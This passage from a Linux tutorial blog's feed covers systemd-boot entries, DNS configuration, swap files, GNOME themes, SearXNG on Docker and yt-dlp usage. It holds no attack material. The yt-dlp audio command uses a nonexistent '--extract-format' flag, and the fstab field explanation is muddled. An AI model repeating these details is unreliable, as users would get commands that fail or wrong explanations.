1. **Update the Bootloader:**

   Open a terminal and enter the following command to update the bootloader configuration:

   ```shell
   sudo bootctl update
   ```

By performing this optional step, you&apos;re making sure that your bootloader&apos;s configuration is up to date and accurately reflects the removal of the custom kernel. This helps maintain the overall integrity of your system&apos;s boot process.

## Conclusion

Congratulations! You&apos;ve successfully navigated the process of building a custom Linux kernel on your Arch Linux system. From acquiring the source code to configuring, compiling, and integrating the kernel into your boot loader, you&apos;ve gained an in-depth understanding of the kernel&apos;s inner workings. This knowledge not only empowers you to fine-tune your system&apos;s performance and features but also deepens your grasp of the foundational components of your operating system.

Having crafted your own Linux kernel, you now possess the ability to tailor your system&apos;s behavior according to your preferences and requirements. The advantages of a customized kernel configuration are at your fingertips, enabling you to harness the full potential of your hardware.

When it comes to removing a custom kernel from your Linux system, a cautious approach is key to maintaining system stability. By meticulously identifying the kernel, booting into an alternate version, and systematically removing associated files, you can safely eliminate a custom kernel. This method ensures that your system retains its functionality and efficiency, reflecting your current needs and choices.

## References

- [How to compile and install Linux Kernel 5.16.9 from source code](https://www.cyberciti.biz/tips/compiling-linux-kernel-26.html)
- [How to build and install your own Linux kernel](https://wiki.linuxquestions.org/wiki/How_to_build_and_install_your_own_Linux_kernel)
- [Kernel/Traditional compilation](https://wiki.archlinux.org/title/Kernel/Traditional_compilation)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Using Different Linux Kernel Versions with systemd-boot and Bootctl</title><link>https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-config-new-options/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/systemd-boot/bootctl-config-new-options/</guid><description>Exploring the process of seamlessly switching between Linux kernel versions using systemd-boot and Bootctl for enhanced system performance and flexibility.</description><pubDate>Tue, 22 Aug 2023 00:00:00 GMT</pubDate><content:encoded>### **Introduction**

The Linux kernel forms the foundation of every Linux-based operating system, playing a vital role in hardware interactions and resource management. With the regular release of new kernel versions, users often seek to switch between them for reasons like compatibility testing and performance optimization. In this blog post, we&apos;ll delve into the process of utilizing systemd-boot and Bootctl to efficiently manage and boot into distinct Linux kernel versions through the creation of new configuration entries.

### **Understanding systemd-boot and Bootctl**

Systemd-boot, an integral component of the systemd project, is a straightforward UEFI boot manager. It empowers users to choose and boot into diverse operating systems or kernel versions during system startup. Bootctl serves as the command-line interface for configuring systemd-boot settings.

### **Prerequisites**

Before embarking on the journey, ensure you meet these prerequisites:
- A Linux-based operating system configured with systemd-boot as the bootloader.
- Basic familiarity with command-line interactions.
- Administrative (root) privileges.

### **Steps to Use Different Linux Kernel Versions**

Now that we understand the significance of managing Linux kernel versions and the role of systemd-boot and Bootctl, let&apos;s dive into the process of configuring new boot options. This section will guide you through the steps required to set up your system to seamlessly switch between different Linux kernel versions according to your needs.

#### **Step 1: Identify Available Kernel Versions**

Initiate your exploration by listing the kernel versions available on your system. Open a terminal and execute this command:

```shell
ls /boot/vmlinuz*
```

This will provide you with a list of available kernel images on your system.

#### **Step 2: Create a New Configuration Entry**

1. Navigate to the directory housing systemd-boot configuration entries:
```shell
cd /boot/loader/entries
```

2. Craft a fresh configuration file for your preferred kernel version (e.g., `my_kernel.conf`) using a text editor such as `nano` or `vim`:
```shell
sudo nano my_kernel.conf
```

3. In the configuration file, outline the entry&apos;s specifics. Replace `&lt;kernel_version&gt;` with the actual version you intend to use:
```conf
title My Custom Kernel
linux /vmlinuz-&lt;kernel_version&gt;
initrd /initramfs-&lt;kernel_version&gt;.img
options root=UUID=&lt;root_partition_UUID&gt; ro
```

- `title`: A user-friendly title for the entry.
- `linux`: Path to the kernel image file.
- `initrd`: Path to the initial RAM disk image.
- `options`: Kernel command-line options.

4. Save the configuration file and exit the text editor.

#### **Step 3: Reboot and Select Kernel**

1. Reboot your system to encounter the freshly added entry within the systemd-boot menu:
```shell
sudo reboot
```

Now, after rebooting your system, you should immediately see your freshly added entry within the systemd-boot menu. This means you no longer have to go through the process of tapping keys during boot-up to access the boot menu. Your new options are right there, ready to be chosen.

By seamlessly configuring and utilizing these new boot options, you&apos;ve enhanced your system&apos;s flexibility, enabling you to effortlessly switch between different Linux kernel versions according to your requirements.

This newfound capability allows you to tap into kernel advancements, optimize performance, and conduct compatibility tests with ease. However, always exercise caution and maintain backups before making any significant changes to your system&apos;s configuration.

### **Conclusion**

Harnessing the prowess of systemd-boot and Bootctl for managing diverse Linux kernel versions empowers users to leverage kernel improvements and evaluate compatibility. Through the creation of novel configuration entries and the utilization of systemd-boot&apos;s intuitive boot menu, transitioning between kernel versions that align with your needs becomes seamless. Exercise caution and maintain backups before making system configuration changes.

Remember, improper alterations to bootloader and kernel configurations can lead to unintended consequences. Always exercise prudence, conduct thorough research, and proceed with caution when modifying system settings.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Changing DNS Servers on Linux</title><link>https://ummit.dev//posts/linux/undefine/change-your-dns-server-on-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/change-your-dns-server-on-linux/</guid><description>Learn how to improve your network performance by changing DNS servers on Linux. Configure popular DNS servers like Cloudflare DNS and Google DNS to enhance your browsing experience.</description><pubDate>Sat, 19 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Efficient network connectivity is vital for a seamless online experience. One way to enhance your network performance is by utilizing faster and more reliable DNS (Domain Name System) servers. In this guide, we&apos;ll show you how to change DNS servers on a Linux system by modifying the `/etc/resolv.conf` file. We&apos;ll focus on configuring two popular DNS servers: Cloudflare DNS and Google DNS. By the end of this tutorial, you&apos;ll have the tools to optimize your network&apos;s performance and responsiveness.

## Understanding DNS Servers

DNS servers are crucial in translating human-readable domain names (e.g., www.example.com) into IP addresses that computers understand. Using faster and more reliable DNS servers can significantly reduce the time it takes to resolve domain names, resulting in quicker website loading times.

## Configuring DNS Servers

Configuring DNS servers on your Linux system involves editing a specific configuration file. Below, we&apos;ll guide you through the process of configuring popular DNS servers such as Cloudflare DNS and Google DNS.

### Using Cloudflare DNS (1.1.1.1 and 1.0.0.1)

Cloudflare DNS is renowned for its impressive speed, often outperforming other DNS servers. To set up your Linux system to utilize Cloudflare DNS, follow these steps:

1. Open a terminal window.

2. Edit the `/etc/resolv.conf` file using a text editor such as `nano` or `vim`:

   ```shell
   sudo nano /etc/resolv.conf
   ```

3. Add the following lines at the top of the file:

   ```shell
   nameserver 1.1.1.1
   nameserver 1.0.0.1
   ```

These lines specify the Cloudflare DNS servers for domain name resolution.

### Using Google DNS (8.8.8.8 and 8.8.4.4)

Google DNS is another popular choice, valued for its reliability and performance. To configure your system to use Google DNS, follow these steps:

1. Open a terminal window.

2. Edit the `/etc/resolv.conf` file:

   ```shell
   sudo nano /etc/resolv.conf
   ```

3. Add the following lines:

   ```shell
   nameserver 8.8.8.8
   nameserver 8.8.4.4
   ```

These lines indicate the Google DNS servers for your domain resolution needs.

With these configurations in place, your Linux system will utilize either Cloudflare DNS or Google DNS for translating domain names to IP addresses. This can result in improved speed and responsiveness, ultimately enhancing your online experience.

## Installation on Arch-Based Linux

If you&apos;re using an Arch-Based Linux distribution, such as Arch Linux or Manjaro, you can easily install the necessary tools for working with DNS settings. The `dnsutils` package provides essential utilities like `nslookup` and `dig`. To install this package, follow these steps:

1. Open a terminal window.

2. Run the following command to install the `dnsutils` package:

   ```shell
   sudo pacman -S dnsutils
   ```

This will install the required tools for DNS-related tasks on your Arch-Based system.

### Verifying Your Configured DNS Server

After configuring your DNS server, it&apos;s important to verify that your Linux system is indeed using the desired DNS server. You can achieve this by using the `dig` command in combination with `grep` to extract relevant information. Follow these steps:

1. Open a terminal window.

2. Enter the following command:

   ```shell
   dig | grep &quot;SERVER&quot;
   ```

This command will display the DNS server information currently in use by your system. By performing this check, you can ensure that your chosen DNS server has been successfully configured and is actively being utilized for domain name resolution.

## Conclusion

Changing DNS servers on your Linux system is a straightforward way to enhance network performance and reduce latency. By configuring popular DNS servers like Cloudflare DNS (1.1.1.1 and 1.0.0.1) or Google DNS (8.8.8.8 and 8.8.4.4), you can experience faster and more reliable domain name resolution. Whether you&apos;re looking to streamline your browsing experience or optimize online activities, adjusting your DNS settings can make a significant impact on your network&apos;s responsiveness.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Swap File on Your Linux VPS</title><link>https://ummit.dev//posts/linux/self-host/linux-vps-create-swap/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/linux-vps-create-swap/</guid><description>Enhance your Linux VPS&apos;s performance and memory management by adding a swap file. Follow our detailed walkthrough to learn how to create a swap file on your Linux VPS.</description><pubDate>Mon, 14 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Adding a swap file to your Linux Virtual Private Server (VPS) can significantly enhance system performance and optimize memory management. In this guide, we will provide a step-by-step walkthrough to help you create a swap file on your Linux VPS.

## Why Enable Swap?

Enabling swap on your Linux VPS system can significantly enhance its performance and ensure smoother operations. Linux is renowned for its ability to run efficiently on low-spec hardware, making it possible to operate servers even with limited resources such as 512MB RAM or 1GB RAM. However, there are instances when these resources may prove inadequate for certain workloads.

This is where a swap file comes into play. It acts as a supplementary form of memory that the system can utilize when physical RAM is exhausted. Here&apos;s why enabling swap is beneficial:

1. **Improved Multitasking:** Swap facilitates smoother multitasking by providing supplementary memory capacity for processes and applications to operate effectively. This enhanced memory management ensures your VPS can seamlessly handle multiple tasks simultaneously.

2. **Memory Safety Net:** In scenarios where memory-intensive processes surge unexpectedly, swap acts as a safety net, preventing your system from becoming unresponsive or crashing. This safety mechanism ensures the stability of your VPS during varying workloads.

3. **Smooth Operations:** With swap in place, your VPS can gracefully navigate through instances of high memory demand. This results in consistently smooth and reliable performance, even during periods of resource strain.

4. **Optimal Performance:** By harmonizing physical RAM with swap space, your VPS achieves an equilibrium that optimizes its performance. This equilibrium empowers your system to proficiently manage memory-intensive tasks without compromising its overall responsiveness.

5. **Enhanced Workload Capacity:** Enabling swap effectively broadens the spectrum of tasks your VPS can adeptly handle. By extending its capabilities through additional memory, your system becomes more adaptable to diverse workloads, ensuring a seamless user experience regardless of hardware limitations.

Enabling swap effectively extends the capabilities of your VPS, allowing it to handle a broader range of workloads and ensuring a seamless user experience, even when operating with modest hardware resources.

## Step 1: Checking Existing Swap Space (Optional)

Before proceeding with creating a new swap file, it&apos;s advisable to check if your VPS already has active swap space. Open a terminal and run the following command:

```shell
sudo swapon --show
```

If there is no output, your VPS likely doesn&apos;t have active swap space, making it an ideal candidate for creating a new swap file.

## Step 2: Creating the Swap File

To create a 2GB swap file, follow these steps:

1. Connect to your VPS via SSH.

2. Execute the following command to create a 2GB swap file (you can adjust the size as needed):

```shell
sudo fallocate -l 2G /swapfile
```

3. Set appropriate permissions for the swap file:

```shell
sudo chmod 600 /swapfile
```

4. Prepare the swap file:

```shell
sudo mkswap /swapfile
```

## Step 3: Enabling the Swap File

Once the swap file is created, enable it with the following command:

```shell
sudo swapon /swapfile
```

## Step 4: Making the Swap File Permanent

Ensuring the continuity of the swap file&apos;s functionality after a system reboot requires creating an entry in the `/etc/fstab` file. This file holds a pivotal role in delineating filesystems and devices, including the essential swap space. Let&apos;s illuminate the significance of the `defaults 0 0` parameters:

- **`defaults`:** This amalgamation of mount options consolidates prudent settings for a range of scenarios. It encompasses attributes like `rw` (read-write) and `auto` (automatic mounting during boot).
- **`0`:** This numeric value serves as a lodestar for filesystem checkers (fsck), orchestrating the sequence for assessing filesystems. Since swap space merits examination after other filesystems, the value is judiciously set at 0.
- **`0`:** This value exerts influence over whether the filesystem is subjected to backups through the `dump` command. Given swap space&apos;s unique nature—eschewing backups—this value stands resolutely at 0.

In simpler terms, `defaults 0 0` deftly choreographs an automatic, tailored mount of the swap file during boot, follows with scrutiny of other filesystems, and gracefully sidesteps backup procedures.

Now, let&apos;s give life to this insight:

1. Wield a text editor, such as nano, to unveil the `/etc/fstab` file&apos;s internal mechanisms:

```shell
sudo nano /etc/fstab
```

2. There, an unblemished canvas awaits your artistic touch. Paint a promising future with the following strokes:

```plaintext
/swapfile swap swap defaults 0 0
```

3. Alternatively, should efficiency beckon, employ this optional command to seamlessly weave the required entry into the `/etc/fstab` fabric:

```shell
sudo sh -c &quot;echo &apos;/swapfile swap swap defaults 0 0&apos; &gt;&gt; /etc/fstab&quot;
```

With this optional command, you artfully inscribe the necessary entry into the `/etc/fstab` tapestry.

- **`sudo`:** This command elevates subsequent commands with superuser privileges, often necessitated by administrator permissions.
- **`sh -c`:** This invocation of the shell (sh) with the `-c` flag births the execution of the ensuing command.
- **`&quot;echo &apos;/swapfile swap swap defaults 0 0&apos; &gt;&gt; /etc/fstab&quot;`:** This command, encased in double quotes, journeys into the shell&apos;s domain for execution. The `echo` command composes the specified line (`/swapfile swap swap defaults 0 0`) onto the canvas of the `/etc/fstab` file. The `&gt;&gt;` operator graciously appends the output of the `echo` command to the file.

In essence, the orchestrational prowess of `sh -c` enables you to wield a command as if you were speaking it directly into a shell—offering an elegant avenue for executing a singular command or succinct script within a tailored context.

## Step 5: Adjusting Swappiness (Optional)

Swappiness is a kernel parameter that controls the tendency of the Linux system to move processes out of physical memory (RAM) and onto the swap file. By adjusting the swappiness value, you can fine-tune how aggressively your system uses swap space.

Here&apos;s how you can do it:

1. Open the `/etc/sysctl.conf` file using a text editor like nano:

```shell
sudo nano /etc/sysctl.conf
```

2. Add the following line at the end of the file, adjusting the value to your preference (replace `10` with your desired value):

```plaintext
vm.swappiness=10
```

   The swappiness value ranges from 0 to 100. A lower value, like 10, means the system will use swap space less aggressively, favoring physical memory. A higher value, like 60, makes the system more willing to use swap space.

3. Save the file and exit the text editor.

Modifying the swappiness value can be particularly useful if you have sufficient RAM, and you want to minimize the use of swap space unless it&apos;s absolutely necessary. Conversely, if you find your system frequently using swap even when there&apos;s available RAM, you might consider raising the swappiness value to make more use of the swap space.

## Step 6: Rebooting Your VPS

To bring the changes into effect, initiate a reboot of your VPS:

```shell
sudo reboot
```

## Step 7: Verifying Swap Activation

Ensuring the successful activation of your swap file is imperative. You can employ tools like `htop`, `btop`, or the command `swapon --show` to validate the presence and utilization of your swap space.

- **htop:** Launch the `htop` utility to visualize system processes and memory usage. Look for the swap entry in the memory information section.

- **btop:** Similarly, you can use `btop` to monitor system resources. Check for swap information in the displayed data.

- **`swapon --show`:** Alternatively, execute the command `swapon --show` in the terminal. This will provide a concise overview of active swap devices and their respective sizes.

Confirming the presence and engagement of swap space ensures that your VPS is equipped to gracefully manage memory and handle resource-intensive tasks.

## Bonus: Deleting a Swap File (If Needed)

If you find yourself needing to remove the swap file from your Linux VPS, you can follow these steps:

1. **Disable Swap**: To begin, deactivate the swap file using the following command. This command includes the `--verbose` option to provide detailed feedback on the operation:

   ```shell
   sudo swapoff --verbose /swapfile
   ```

   The `--verbose` flag ensures that you receive clear feedback about the deactivation process. This step is crucial before proceeding with the removal of the swap file.

Remember, each step should be performed carefully to ensure the proper functioning of your system.

2. **Remove the Entry from /etc/fstab**: Open the `/etc/fstab` file in a text editor:

   ```shell
   sudo nano /etc/fstab
   ```

    **[Optional] One-line Solution:** To remove the line associated with the swap file from `/etc/fstab`, which typically resembles `/swapfile swap swap defaults 0 0`, you have two options. First, manually locate and delete the line. Alternatively, you can use a single command to achieve this by employing `sed`:

    ```shell
    sudo sed -i &apos;/\/swapfile/d&apos; /etc/fstab
    ```

After executing the command, save the file and exit the text editor to complete the process. Please exercise caution when using the `sed` command, as it directly modifies files. Always ensure you have proper backups or are confident in the changes you are making.

3. **Delete the Swap File**: Finally, delete the swap file using:

   ```shell
   sudo rm /swapfile
   ```

   Confirm the deletion if prompted.

Please exercise caution when using the `sed` command, as it directly modifies files. Ensure that you have a backup or are confident in the changes you are making.

Remember, removing a swap file can impact your system&apos;s performance, so make sure to consider your system&apos;s requirements before proceeding with the deletion.

## Conclusion

By understanding the process of creating, adjusting, and if necessary, deleting a swap file, you have gained valuable insights into managing memory on your Linux VPS. These techniques empower you to fine-tune your system&apos;s performance and ensure optimal resource utilization, even during resource-intensive tasks.

## Reference

- https://phoenixnap.com/kb/linux-swap-file</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customizing Your GNOME Desktop with Installing Icon and cursor themes</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-customize-icon-and-cursor-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-customize-icon-and-cursor-theme/</guid><description>Personalize your GNOME desktop on Linux by installing icon and cursor themes. Easily transform your desktop&apos;s appearance using the GNOME Tweaks tool.</description><pubDate>Mon, 14 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing your GNOME desktop environment is a great way to add a personal touch and make your Linux experience truly your own. One of the easiest and most visually impactful ways to do this is by installing icon and cursor themes. In this guide, we&apos;ll walk you through the process of installing an icon and cursor theme on your GNOME desktop using the GNOME Tweaks tool.

### Why Install Icon Themes?

Icon themes provide a quick and effective way to transform the look and feel of your GNOME desktop. By changing the icons used for applications, folders, system elements and cursor themes, you can give your desktop a fresh and unique appearance that reflects your style.

### Where is the Location Path?

When you install icon themes, they are stored in specific directories on your system. Here are the paths where these themes are located:

&gt; **Note:** The global path applies changes system-wide for all users, while the local path affects only the current user.

#### Global Path

The following is the directory where system-wide icon themes are stored:

```shell
/usr/share/icons/
```

#### Local Path

For individual user-specific icon themes, the path is:

```shell
~/.local/share/icons/
```

These paths play a crucial role in determining the appearance of your icons across the system. Whether you choose a global or local installation, these directories ensure that your selected icon themes are accessible and enhance the visual experience of your desktop environment.

## Step 1: Install GNOME Tweaks

Before you start the installation process, make sure you have GNOME Tweaks installed. GNOME Tweaks is a powerful tool that allows you to customize various aspects of your GNOME desktop, including themes, icons, fonts, and more.

### Option 1: Using Package Manager (Ubuntu/Debian)

If you&apos;re using Ubuntu or a Debian-based distribution, you can install GNOME Tweaks using the package manager. Open your terminal and enter the following command:

```bash
sudo apt install gnome-tweaks
```

### Option 2: Using Package Manager (Fedora)

For Fedora users, you can install GNOME Tweaks using the package manager. Open your terminal and enter the following command:

```bash
sudo dnf install gnome-tweaks
```

### Option 3: Using Package Manager (Arch Linux)

Arch Linux users can install GNOME Tweaks with the following command:

```bash
sudo pacman -S gnome-tweaks
```

## Step 2: Choose an Icon Theme

Before you start the installation process, you need to choose an icon theme that resonates with you. There are numerous icon themes available, each with its own design and aesthetic. For this guide, we&apos;ll demonstrate the installation of the popular &quot;Papirus&quot; icon theme.

## Step 3: Installation - Icon theme

Once you have GNOME Tweaks installed, it&apos;s time to add a new icon theme to your system. Follow these steps to use the Linux Pacman package manager for a seamless installation process.

### Option 1: Using Pacman (Arch Linux - Community)

If you&apos;re using Arch Linux or an Arch-based distribution, you can install the Papirus icon theme using the package manager. Open your terminal and enter the following command:

```bash
sudo pacman -S papirus-icon-theme
```

This command will fetch and install the Papirus icon theme from the official Arch Linux repositories. Please note that the `papirus-icon-theme` package is available in the community repository.

### Option 2: Using AUR (Arch User Repository - Official)

Alternatively, you can install the `papirus-icon-theme-git` package from the Arch User Repository (AUR). First, ensure you have an AUR helper like `yay` installed. Then, use the following command:

```bash
yay -S papirus-icon-theme-git
```

The AUR version might provide the latest updates and features of the Papirus icon theme.

## Step 4: Installation - Cursor theme

&gt;Cursor also is the same install method and the same path.

[Bibata Modern Ice theme](https://github.com/ful1e5/Bibata_Cursor) is great for me. install by using this command:

```shell
yay -S bibata-cursor-theme
```

## Step 5: Update cache

After installing the icon theme, you&apos;ll want to update the icon cache to ensure that your system recognizes the new icons. This is important because sometimes newly installed themes might not work immediately. To update the icon cache, run the following command:

```shell
sudo gtk-update-icon-cache -q -t -f /usr/share/icons/Papirus
```

By following either of these options and updating the icon cache, you can easily enhance your GNOME desktop with the stylish Papirus icon theme, giving your system a fresh and visually appealing look.

## Step 6: Applying the Icon Theme

Once you have successfully installed the icon theme, you can apply it to your GNOME desktop using GNOME Tweaks.

1. **Open GNOME Tweaks:** Press the `Super` key (Windows key) and search for &quot;Tweaks.&quot; Click on the &quot;Tweaks&quot; application to open it.

2. **Select Icons:** In the left sidebar of GNOME Tweaks, click on &quot;Appearance.&quot; Under the &quot;Icons&quot; section, you&apos;ll see a dropdown menu. Click on it and select the &quot;Papirus&quot; icon theme.

3. **Enjoy Your New Icons:** The selected icon theme will be applied immediately. You&apos;ll notice that the icons for applications, folders, and system elements have changed according to the theme you chose.

## Exploring Further

Installing an icon theme is just the beginning of customizing your GNOME desktop. You can further enhance your experience by tweaking other aspects of the desktop, such as the GTK theme, shell theme, and extensions. With each customization, you can create a desktop environment that truly reflects your style and preferences.

Remember that the world of Linux offers a plethora of icon themes to choose from. Feel free to explore different themes until you find the one that speaks to you the most.

## Conclusion

Customizing your GNOME desktop with icon themes using the GNOME Tweaks tool is a fantastic way to express your creativity and personalize your Linux experience. The process is straightforward, and you can easily switch between different themes to find the one that suits you best. Whether you prefer a sleek and modern look or a more playful and artistic vibe, icon themes allow you to transform your desktop into a visual masterpiece.

## References

- [10 Best Cursor Themes for Linux Desktops](https://www.debugpoint.com/best-cursor-themes/)
- [Bibata Modern Ice](https://www.gnome-look.org/p/1197198/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting up SearXNG on your SSH VPS Server with Docker</title><link>https://ummit.dev//posts/linux/self-host/searxng-selfhost-on-your-vps/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/searxng-selfhost-on-your-vps/</guid><description>Set up your private SearXNG metasearch engine on an SSH VPS server using Docker. Follow this concise guide to quickly install, customize, and maintain SearXNG.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

SearXNG is a powerful metasearch engine that respects your privacy by aggregating results from various search engines while not tracking your searches. In this guide, we&apos;ll show you how to quickly set up a SearXNG instance on your SSH VPS server using Docker.

## What&apos;s Included?

The SearXNG Docker setup includes the following components:

| Name      | Description                                     | Docker image                        | Dockerfile                                |
| --------- | ----------------------------------------------- | ----------------------------------- | ----------------------------------------- |
| Caddy     | Reverse proxy with automatic LetsEncrypt certs | [caddy/caddy:2-alpine](https://hub.docker.com/_/caddy) | [Dockerfile](https://github.com/caddyserver/caddy-docker) |
| SearXNG   | SearXNG search engine                          | [searxng/searxng:latest](https://hub.docker.com/r/searxng/searxng) | [Dockerfile](https://github.com/searxng/searxng/blob/master/Dockerfile) |
| Redis     | In-memory database                             | [redis:alpine](https://hub.docker.com/_/redis) | [Dockerfile-alpine.template](https://github.com/docker-library/redis/blob/master/Dockerfile-alpine.template) |

## Buying a Domain and VPS Server

Before diving into the installation process, you need both a domain name and a VPS server. You can purchase a domain from platforms like Cloudflare, Namecheap, and others. Likewise, you can choose reputable VPS providers such as Linode, DigitalOcean, or AWS Lightsail to host your SearXNG instance.

1. **Acquire a Domain:**
   Purchase a domain name from a domain registrar like Cloudflare or Namecheap. This will be the web address through which you access your SearXNG instance.

2. **Choose a VPS Provider:**
   Select a reliable VPS provider such as Linode, DigitalOcean, or AWS Lightsail. Ensure that the chosen provider meets your requirements in terms of server resources and location.

### Step 1: Configure DNS Settings

For your domain to point to your VPS server, you&apos;ll need to configure DNS settings:

1. **Obtain Server IP Address:**
   After setting up your VPS server, copy the real IP address of your server. You&apos;ll need this IP address to configure DNS settings.

2. **Configure DNS Records:**
   Access the DNS management interface of your domain registrar. Add an A record that points to your VPS server&apos;s IP address. This step ensures that your domain directs visitors to your SearXNG instance.

## Step 2: Prepare Your System and Install Docker

Before setting up SearXNG with Docker, make sure your system is up to date and has the necessary tools installed. Follow these steps:

1. **Update and Upgrade:**
   Open a terminal and update your package repositories and upgrade installed packages:

   ```shell
   sudo apt update -y
   sudo apt upgrade -y
   ```

2. **Install Docker and Docker Compose:**
   Install Docker and Docker Compose using the following commands:

   ```shell
   sudo apt install docker.io docker-compose -y
   ```

## Step 3: Clone the SearXNG Docker Repository

Continue with the installation process by cloning the SearXNG Docker repository:

```shell
cd /usr/local/
git clone https://github.com/searxng/searxng-docker.git
cd searxng-docker
```

## Step 4: Set Up Environment and Generate Secret Key

Customize your SearXNG environment by editing the `.env` file in the `searxng-docker` directory. Follow these steps:

1. Open the `.env` file using your preferred text editor:

   ```shell
   nano /usr/local/searxng-docker/.env
   ```

2. Replace `&lt;host&gt;` with your desired SearXNG hostname and `&lt;email&gt;` with your email address to set up a Let&apos;s Encrypt certificate.

   Example:

   ```shell
   SEARXNG_HOSTNAME=mysearxng.example.com
   LETSENCRYPT_EMAIL=you@example.com
   ```

   Save the changes and exit the text editor.

3. Generate a secret key for SearXNG by executing the following command:

   ```shell
   sed -i &quot;s|ultrasecretkey|$(openssl rand -hex 32)|g&quot; /usr/local/searxng-docker/searxng/settings.yml
   ```

   This ensures a secure configuration for your SearXNG instance.

### Example of **.env**

Here&apos;s an example of how your `.env` file might look:

```shell
# By default listen on https://localhost
# To change this:
# * uncomment SEARXNG_HOSTNAME, and replace &lt;host&gt; by the SearXNG hostname
# * uncomment LETSENCRYPT_EMAIL, and replace &lt;email&gt; by your email (required for Let&apos;s Encrypt certificate)

SEARXNG_HOSTNAME=mysearxng.example.com
LETSENCRYPT_EMAIL=you@example.com
```

These steps will ensure a tailored environment for your SearXNG setup.

## Step 5: Customize Settings

Edit the `searxng/settings.yml` file according to your preferences and needs.

### Example of **settings.yml**

Here&apos;s an example of how your `settings.yml` file might look:

```shell
# see https://docs.searxng.org/admin/engines/settings.html#use-default-settings
use_default_settings: true
server:
  # base_url is defined in the SEARXNG_BASE_URL environment variable, see .env and docker-compose.yml
  secret_key: &quot;your_keys&quot;  # change this!
  limiter: true  # can be disabled for a private instance
  image_proxy: true
  method: &quot;GET&quot;
ui:
  static_use_hash: true
  default_theme: simple
  theme_args:
    simple_style: dark
redis:
  url: redis://redis:6379/0
general:
  instance_name:  &quot;SearXNG  - Search Engine&quot;
search:
  safe_search: 0
  autocomplete: &quot;&quot;
  default_lang: &quot;&quot;
```

## Step 6: Start SearXNG

Ensure everything is set up correctly by starting the SearXNG instance:

```shell
sudo docker-compose up -d
```

This will launch the SearXNG stack and keep it running in the background, allowing you to continue using the terminal for other tasks.

## Step 7: Verify and Access SearXNG

With SearXNG running in the background, you can now access it through your web browser. Open your browser and enter the hostname you configured earlier, prefixed with `https://`. You should see the SearXNG search interface, ready for private and efficient searches.

## Updating Your SearXNG Instance

Ensuring your SearXNG instance is up-to-date is crucial for maintaining security and performance. To update your SearXNG stack, follow these simplified steps:

1. **Stop and Remove Containers:**
   Open a terminal and navigate to the `searxng-docker` directory. Stop and remove the current SearXNG containers:

   ```shell
   cd /usr/local/searxng-docker
   sudo docker-compose down
   ```

2. **Pull Latest Docker Images:**
   After stopping the containers, pull the latest SearXNG Docker images to ensure you have the most recent updates:

   ```shell
   sudo docker-compose pull
   ```

3. **Start Updated Stack in Background:**
   Start the updated SearXNG stack in the background:

   ```shell
   sudo docker-compose up -d
   ```

By following these three simple steps, you&apos;ll successfully update your SearXNG instance, ensuring an improved and secure search experience.

## Conclusion

Setting up your SearXNG instance using Docker is now a streamlined process, thanks to this guide. While the provided `docker-compose.yml` file is comprehensive, we understand that the official `docker-compose` README might not be the most user-friendly resource for everyone. That&apos;s why we&apos;ve gone the extra mile to break down the Docker Compose setup and explain its components in a more accessible way.

By creating this guide, we aim to bridge the gap and make the process of deploying your own SearXNG instance smoother and more understandable. Docker Compose abstracts the complexity of managing containers and services, but we&apos;ve taken the effort to provide you with insights into how each service works together to bring your SearXNG metasearch engine to life.

Feel confident in using Docker Compose to set up and maintain your SearXNG instance. This guide empowers you to create your private, efficient, and privacy-respecting search engine.

### Keeping Your System and SearXNG Up to Date

To maintain the security and optimal performance of your SearXNG instance and the underlying Linux system, remember to:

- Regularly apply updates to your Linux system.
- Periodically update your SearXNG using Docker Compose.

By adhering to these practices, you ensure that both your SearXNG instance and your system remain current and resilient.

## Reference

- https://github.com/searxng/searxng-docker</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>yt-dlp Command Line Tools: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/yt-dlp/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/yt-dlp/</guid><description>Learn how to use yt-dlp&apos;s command-line tools to download videos, audio tracks, and customize number formats for a more organized media library.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

This guide walk you through the command-line tools of yt-dlp, a powerful utility for downloading videos and audio tracks from various streaming platforms. yt-dlp offers a wide range of features, including video format selection, audio extraction, chapter handling, subtitle management, and more.

## Simple and Straightforward Video Download

For a quick and straightforward video download without additional commands, use the following:

```bash
yt-dlp [video URL]
```

## Listing Video Formats

To view available video formats and their details, you can use the following command:

```shell
yt-dlp -F [video URL]
```

This command provides a detailed list of available formats, including resolution, file size, codecs, and more. The output helps you choose the desired format for your download.

### Targeting Specific Format ID

After listing the available formats, you can target a specific format ID to download the video in that format. Higher numbers generally indicate better quality:

```shell
yt-dlp -f 248+251 [video URL]
```

This command selects the video (ID 248) and audio (ID 251) formats, merging them into a single file.

### Targeting Specific Extension Type

If you prefer a specific extension type, such as mp4, you can use:

```shell
yt-dlp -f mp4 [video URL]
```

This command filters the formats to include only those with the mp4 extension, simplifying your download preferences.

## Extracting Audio from a Video

Sometimes, you might only be interested in the audio content of a video, especially for music tracks. to extract the audio from a video, use the following command:

```bash
yt-dlp --extract-format --audio-format mp3 [video URL]
```

This command tells yt-dlp to extract the audio ( `--extract-format` or `-x`) and convert it to the MP3 format (`--audio-format mp3`).

## Batch Downloading with list

Batch downloading can be useful when you want to download multiple videos in one go. You dont need to one-by-one paste to one command. Here&apos;s how you can achieve this with yt-dlp:

